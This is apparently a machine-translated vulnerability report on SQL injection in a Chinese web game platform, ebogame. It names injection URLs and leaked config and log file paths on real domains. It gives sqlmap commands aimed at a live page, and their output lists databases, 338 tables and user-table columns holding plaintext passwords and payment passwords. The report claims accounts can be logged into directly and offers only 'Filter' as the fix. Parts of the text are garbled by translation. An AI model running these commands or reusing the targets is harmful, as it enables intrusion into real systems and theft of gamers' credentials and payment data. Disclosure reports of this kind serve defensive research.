Multiple ebogame web game platforms have the SQL Injection Vulnerability (ROOT permission), causing information leakage of million gamers (username/password/payment password, etc)

Multiple ebogame web game platforms have the SQL Injection Vulnerability (ROOT permission), causing information leakage of million gamers (username/password/payment password, etc)

Multiple ebogame web game platforms have the SQL Injection Vulnerability (ROOT permission), which results in Information Leakage of million gamers (username/password/payment password, etc.) as well as order information leakage and mysql password leakage.


Make good slag.

 

Mask Region

  
   1.http://**.**.**/gameing.phpurl=http%3A%2F%2Fs1.ebogame.yjxy.mlong.cn_2.http://**.**.**/codereceive.phpcid=2545_3.http://**.**.**/news.phpcontentid=2296_4.http://**.**.**/news.phpcontentid=1407
  

These are SQL injection points.
 

Mask Region

  
   1.http://**.**.**/caches/configs/database.php
  

Mysql password leakage but not external connection
 

Http://sglj.ebogame.com/log.txt

Http://ebo.ebogame.com/log.txt

Http://www.ebogame.com/log.txt

Leaked order information, and today's.
 

 

Sqlmap. py-u "http://www.ebogame.com/codereceive.php? Cid = 2545 "-D ebogame -- tables> C: \ test.txt

Available databases [13]:

[*] 5ebo

[*] 5ebo_bbs

[*] 5ebo_oa

[*] 5ebo_ucenter

[*] 5ebo_www

[*] 5ebo_www_test

[*] Eboedu

[*] Ebogame

[*] Ebogame_1

[*] Information_schema

[*] My

[*] Mysql

[*] Test



Database: ebogame

[338 tables]

+ ----------------------------------- +

| Api_send_mail |

| Bbs_actlogs |

| Bbs_apclog |

| Bbs_beg |

| Bbs_bmbcode |

| Bbs_contacts |

| Bbs_emoticons |

| Bbs_favorites |

| Bbs_forumdata |

| Bbs_gueststat |

| Bbs_invite |

| Bbs_lastest |

| Bbs_levels |

| Bbs_onlinestat |

| Bbs_polls |

| Bbs_posts |

| Bbs_potlog |

| Bbs_primsg |

| Bbs_schedule |

| Bbs_search |

| Bbs_appsforum |

| Bbs_tags |

| Bbs_threads |

| Bbs_ugoptlist |

| Bbs_usergroup |

| Bbs_userlist |

| Ebogame_activation |

| Ebogame_advertising |

| Ebogame_advertising_click |

| Ebogame_bbs |

| Ebogame_bbs_section |

| Ebogame_category |

| Ebogame_charge |

| Ebogame_charge_20160118 |

| Ebogame_charge_bf |

| Ebogame_charge_copy |

| Ebogame_charge_heepay |

| Ebogame_content |

| Ebogame_extension |

| Ebogame_extension_member |

| Ebogame_extension_percent |

| Ebogame_extension_settlemen |

| Ebogame_extension_settlemen_once |

| Ebogame_game_areas |

| Ebogame_game_code |

| Ebogame_game_gift_code |

| Ebogame_game_gift_code _ |

| Ebogame_game_gift_code_17173 |

| Ebogame_game_gift_info _ |

| Ebogame_game_gift_info_17173 |

| Ebogame_games |

| Ebogame_integral |

| Ebogame_member |

| Ebogame_member_char |

| Ebogame_member_info |

| Ebogame_member_integral |

| Ebogame_member_login |

| Ebogame_member_price |

| Ebogame_member_serv |

| Ebogame_news |

| Ebogame_pictures |

| Ebogame_price |

| Ebogame_question_reply |

| Ebogame_questions |

| Pre_common_admincp_cmenu |

| Pre_common_admincp_group |

| Pre_common_admincp_member |

| Pre_common_admincp_perm |

| Pre_common_admincp_session |

| Pre_common_admingroup |

| Pre_common_adminnote |

| Pre_common_advertisement |

| Pre_common_advertisement_custom |

| Pre_common_banned |

| Pre_common_block |

| Pre_common_block_favorite |

| Pre_common_block_item |

| Pre_common_block_item_data |

| Pre_common_block_permission |

| Pre_common_block_pic |

| Pre_common_block_style |

| Pre_common_block_xml |

| Pre_common_cache |

| Pre_common_card |

| Pre_common_card_log |

| Pre_common_card_type |

| Pre_common_connect_guest |

| Pre_common_credit_log |

| Pre_common_credit_rule |

| Pre_common_credit_rule_log |

| Pre_common_credit_rule_log_field |

| Pre_common_cron |

| Pre_common_devicetoken |

| Pre_common_district |

| Pre_common_diy_data |

| Pre_common_domain |

| Pre_common_failedlogin |

| Pre_common_friendlink |

| Pre_common_grouppm |

| Pre_common_invite |

| Pre_common_magic |

| Pre_common_magiclog |

| Pre_common_mailcron |

| Pre_common_mailqueue |

| Pre_common_member |

| Pre_common_member_action_log |

| Pre_common_member_connect |

| Pre_common_member_count |

| Pre_common_member_crime |

| Pre_common_member_field_forum |

| Pre_common_member_field_home |

| Pre_common_member_grouppm |

| Pre_common_member_log |

| Pre_common_member_magic |

| Pre_common_member_medal |

| Pre_common_member_profile |

| Pre_common_member_profile_setting |

| Pre_common_member_security |

| Pre_common_member_stat_field |

| Pre_common_member_status |

| Pre_common_member_validate |

| Pre_common_member_verify |

| Pre_common_member_verify_info |

| Pre_common_myapp |

| Pre_common_myinvite |

| Pre_common_mytask |

| Pre_common_nav |

| Pre_common_onlinetime |

| Pre_common_patch |

| Pre_common_plugin |

| Pre_common_pluginvar |

| Pre_common_process |

| Pre_common_regip |

| Pre_common_relatedlink |

| Pre_common_report |

| Pre_common_searchindex |

| Pre_common_secquestion |

| Pre_common_session |

| Pre_common_setting |

| Pre_common_smiley |

| Pre_common_sphinxcounter |

| Pre_common_stat |

| Pre_common_statuser |

| Pre_common_style |

| Pre_common_stylevar |

| Pre_common_syscache |

| Pre_common_tag |

| Pre_common_tagitem |

| Pre_common_task |

| Pre_common_taskvar |

| Pre_common_template |

| Pre_common_template_block |

| Pre_common_template_permission |

| Pre_common_uin_black |

| Pre_common_usergroup |

| Pre_common_usergroup_field |

| Pre_common_word |

| Pre_common_word_type |

| Pre_connect_disktask |

| Pre_connect_feedlog |

| Pre_connect_memberbindlog |

| Pre_connect_postfeedlog |

| Pre_connect_tthreadlog |

| Pre_forum_access |

| Pre_forum_activity |

| Pre_forum_activityapply |

| Pre_forum_announcement |

| Pre_forum_attachment |

| Pre_forum_attachment_0 |

| Pre_forum_attachment_1 |

| Pre_forum_attachment_2 |

| Pre_forum_attachment_3 |

| Pre_forum_attachment_4 |

| Pre_forum_attachment_5 |

| Pre_forum_attachment_6 |

| Pre_forum_attachment_7 |

| Pre_forum_attachment_8 |

| Pre_forum_attachment_9 |

| Pre_forum_attachment_exif |

| Pre_forum_attachment_unused |

| Pre_forum_attachtype |

| Pre_forum_bbcode |

| Pre_forum_collection |

| Pre_forum_collectioncomment |

| Pre_forum_collectionfollow |

| Pre_forum_collectioninvite |

| Pre_forum_collectionrelated |

| Pre_forum_collectionteamworker |

| Pre_forum_collectionthread |

| Pre_forum_creditslog |

| Pre_forum_debate |

| Pre_forum_debatepost |

| Pre_forum_faq |

| Pre_forum_forum |

| Pre_forum_forum_threadtable |

| Pre_forum_forumfield |

| Pre_forum_forumrecommend |

| Pre_forum_groupcreditslog |

| Pre_forum_groupfield |

| Pre_forum_groupinvite |

| Pre_forum_grouplevel |

| Pre_forum_groupuser |

| Pre_forum_imagetype |

| Pre_forum_medal |

| Pre_forum_medallog |

| Pre_forum_memberrecommend |

| Pre_forum_moderator |

| Pre_forum_modwork |

| Pre_forum_onlinelist |

| Pre_forum_order |

| Pre_forum_poll |

| Pre_forum_polloption |

| Pre_forum_pollvoter |

| Pre_forum_post |

| Pre_forum_post_location |

| Pre_forum_post_moderate |

| Pre_forum_post_tableid |

| Pre_forum_postcache |

| Pre_forum_postcomment |

| Pre_forum_postlog |

| Pre_forum_poststick |

| Pre_forum_promotion |

| Pre_forum_ratelog |

| Pre_forum_relatedthread |

| Pre_forum_replycredit |

| Pre_forum_rsscache |

| Pre_forum_spacecache |

| Pre_forum_statlog |

| Pre_forum_thread |

| Pre_forum_thread_moderate |

| Pre_forum_threadaddviews |

| Pre_forum_threadclass |

| Pre_forum_threadclosed |

| Pre_forum_threaddisablepos |

| Pre_forum_threadimage |

| Pre_forum_threadlog |

| Pre_forum_threadmod |

| Pre_forum_threadpartake |

| Pre_forum_threadpreview |

| Pre_forum_threadrush |

| Pre_forum_threadtype |

| Pre_forum_trade |

| Pre_forum_tradecomment |

| Pre_forum_tradelog |

| Pre_forum_tyexception |

| Pre_forum_typeoptionvar |

| Pre_forum_typevar |

| Pre_forum_warning |

| Pre_home_album |

| Pre_home_album_category |

| Pre_home_appcreditlog |

| Pre_home_blacklist |

| Pre_home_blog |

| Pre_home_blog_category |

| Pre_home_blog_moderate |

| Pre_home_blogfield |

| Pre_home_class |

| Pre_home_click |

| Pre_home_clickuser |

| Pre_home_comment |

| Pre_home_comment_moderate |

| Pre_home_docomment |

| Pre_home_doing |

| Pre_home_doing_moderate |

| Pre_home_favorite |

| Pre_home_feed |

| Pre_home_feed_app |

| Pre_home_follow |

| Pre_home_follow_feed |

| Pre_home_follow_feed_archiver |

| Pre_home_friend |

| Pre_home_friend_request |

| Pre_home_friendlog |

| Pre_home_notification |

| Pre_home_pic |

| Pre_home_pic_moderate |

| Pre_home_picfield |

| Pre_home_poke |

| Pre_home_pokearchive |

| Pre_home_share |

| Pre_home_assist_moderate |

| Pre_home_show |

| Pre_home_specialuser |

| Pre_home_userapp |

| Pre_home_userappfield |

| Pre_home_visitor |

| Pre_mobile_setting |

| Pre_portal_article_content |

| Pre_portal_article_count |

| Pre_portal_article_moderate |

| Pre_portal_article_related |

| Pre_portal_article_title |

| Pre_portal_article_trash |

| Pre_portal_attachment |

| Pre_portal_category |

| Pre_portal_category_permission |

| Pre_portal_comment |

| Pre_portal_comment_moderate |

| Pre_portal_rsscache |

| Pre_portal_topic |

| Pre_portal_topic_pic |

| Pre_security_evilpost |

| Pre_security_eviluser |

| Pre_security_failedlog |

| Pre_ucenter_admins |

| Pre_ucenter_applications |

| Pre_ucenter_badwords |

| Pre_ucenter_domains |

| Pre_ucenter_failedlogins |

| Pre_ucenter_feeds |

| Pre_ucenter_friends |

| Pre_ucenter_mailqueue |

| Pre_ucenter_memberfields |

| Pre_ucenter_members |

| Pre_ucenter_mergemembers |

| Pre_ucenter_newpm |

| Pre_ucenter_notelist |

| Pre_ucenter_pm_indexes |

| Pre_ucenter_pm_lists |

| Pre_ucenter_pm_members |

| Pre_ucenter_pm_messages_0 |

| Pre_ucenter_pm_messages_1 |

| Pre_ucenter_pm_messages_2 |

| Pre_ucenter_pm_messages_3 |

| Pre_ucenter_pm_messages_4 |

| Pre_ucenter_pm_messages_5 |

| Pre_ucenter_pm_messages_6 |

| Pre_ucenter_pm_messages_7 |

| Pre_ucenter_pm_messages_8 |

| Pre_ucenter_pm_messages_9 |

| Pre_ucenter_protectedmembers |

| Pre_ucenter_settings |

| Pre_ucenter_sqlcache |

| Pre_ucenter_tags |

| Pre_ucenter_vars |

| Sglj_charge |

| Sglj_coin |

| Sglj_extension |

+ ----------------------------------- +



Ebogame_member



Sqlmap. py-u "http://www.ebogame.com/codereceive.php? Cid = 2545 "-D ebogame-T ebogame_member -- columns



Database: ebogame

Table: ebogame_member

[24 columns]

+ ---------------- + ----------- +

| Column | Type |

+ ---------------- + ----------- +

| 56xiu_id | char (50) |

| Codestate | int (1) |

| Display | int (1) |

| Error_count | int (1) |

| Error_time | int (11) |

| Id | int (11) |

| Integral | int (11) |

| Integral_get | int (11) |

| Integral_use | int (11) |

| Name | char (20) |

| Newip | char (20) |

| Newtime | int (11) |

| Oldip | char (20) |

| Oldtime | int (11) |

| Password | char (40) |

| Password_nomd5 | char (20) |

| Password_old | char (20) |

| Pay_pass | char (40) |

| Pay_pass_nomd5 | char (20) |

| Regtime | int (11) |

| Role | char (2) |

| Times | int (11) |

| Urlsource | char (100) |

| Yiqidd_id | int (11) |

+ ---------------- + ----------- +




 

 

 

Accounts can be logged on directly
 

Solution:

Filter